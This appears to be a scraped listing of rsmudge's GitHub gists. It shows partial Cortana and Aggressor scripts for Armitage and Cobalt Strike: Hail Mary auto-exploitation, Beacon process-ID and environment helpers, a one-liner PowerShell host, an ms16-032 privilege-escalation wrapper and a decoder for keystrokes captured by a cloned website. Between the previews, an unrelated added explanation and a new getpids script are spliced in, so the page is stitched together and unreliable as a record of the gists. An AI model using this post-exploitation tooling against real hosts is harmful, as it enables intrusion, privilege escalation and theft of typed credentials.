Raphael rsmudge
rsmudge / gist:6717127
Created September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
sub exploitPorts {
    local('$exploit %exploits $options $port');
    foreach $exploit (modules("exploits")) {
        $options = options("exploit", $exploit);
        if ('RPORT' in $options) {
rsmudge / gist:6717164
Created September 26, 2013 17:04
Cortana Hail Mary / Find Attacks Example (taken from my development testing... not tested recently. This code was used in a highly stripped down version of Armitage)
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
popup attacks {
    item "&Find Attacks" {
    item "&Hail Mary" {
rsmudge / irc.cna
Created February 19, 2016 16:24
Aggressor Script IRC Example
# Quick/Dirty IRC Library for use with Aggressor Script
# irc_close($handle);
sub irc_close {
    # $1 is the socket handle returned when the connection was opened
    println($1, "QUIT :Good bye!");
}
rsmudge / getexplorer.cna
# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }
        }
    # bind &callback into the closure so the bps callback can reach it
    }, $callback => $2));
}
rsmudge / getenv.cna
Last active December 11, 2019 19:45
# Aggressor Script means to parse/use environment vars in a Beacon session.
# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # ideally, we'd have a bshell that could take callbacks. We don't have
    # this yet. Eventually though, we will.
rsmudge / getpidany.cna
Created May 2, 2016 16:30
Get PID of Any Process
# getanypid($bid, $proc, &callback);
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }
        }
    # bind the process name and &callback into the closure
    }, $proc => $2, $callback => $3));
}
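The getexplorer.cna and getpidany.cna previews above share one pattern: ask Beacon for its process list with &bps and pick a PID out of the callback. The following is an added example, not code from either gist or from Cobalt Strike itself. It generalizes the pattern to collect every matching PID (compared case-insensitively, since Windows image names are not case-sensitive) and to report the not-found case, which the previews do not handle. It assumes, as the previews do, that each line handed to the bps callback is the image name followed by whitespace and the PID; the names getpids and the pids alias are my own.

```sleep
# getpids($bid, $procname, &callback)
# Runs ps on the Beacon, gathers every PID whose image name matches $procname
# (case-insensitive) and calls [$callback: $bid, $procname, @pids].
# @pids is empty when nothing matched, so the callback can act on that.
sub getpids {
    bps($1, lambda({
        local('@pids $entry $name $pid');
        foreach $entry (split("\n", $2)) {
            # assumption (same layout the gist previews rely on):
            # each line is "<image name><whitespace><pid>..."
            ($name, $pid) = split("\\s+", $entry);
            if (lc($name) eq lc($proc)) {
                push(@pids, $pid);
            }
        }
        # always fire, even with no matches, so callers see the not-found case
        [$callback: $1, $proc, @pids];
    # bind the process name and the callback into the closure
    }, $proc => $2, $callback => $3));
}

# Beacon console command: "pids explorer.exe"
alias pids {
    if ($2 is $null) {
        berror($1, "usage: pids [process name]");
        return;
    }
    getpids($1, $2, {
        # $1 = beacon id, $2 = process name, $3 = list of PIDs
        if (size($3) == 0) {
            berror($1, "no process named $2 found");
        }
        else {
            blog($1, "$2 PIDs: " . join(", ", $3));
        }
    });
}
```

Returning a list rather than the first hit matters on multi-user hosts, where several explorer.exe instances exist in different sessions and the single-PID version silently picks whichever line comes first. If the ps output layout differs in your Cobalt Strike release, adjust the split in the callback; nothing else in the block depends on it.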
rsmudge / bot.cna
Created June 15, 2016 15:38
Demonstration inversion-of-control using co-routines in Aggressor Script.
# demonstrate an example of inversion-of-control with Aggressor Script
# co-routine,
sub bot {
    # run pwd and get the output.
    when("beacon_output_alt", $this);
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
# Why? Generate one-liners for length constrained command execution opportunities
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
rsmudge / ms16-032.cna
Created July 29, 2016 04:11
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
rsmudge / webkeystrokes.cna
Created August 10, 2016 19:44
Shows how to pull keystrokes captured by the website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
# convert comma separated keystroke values (hex character codes) into a string.
sub toString {
    local('@temp');
    @temp = split(",", $1);
    return join("", map({
        return chr(parseNumber($1, 16, 10));
    }, @temp));
}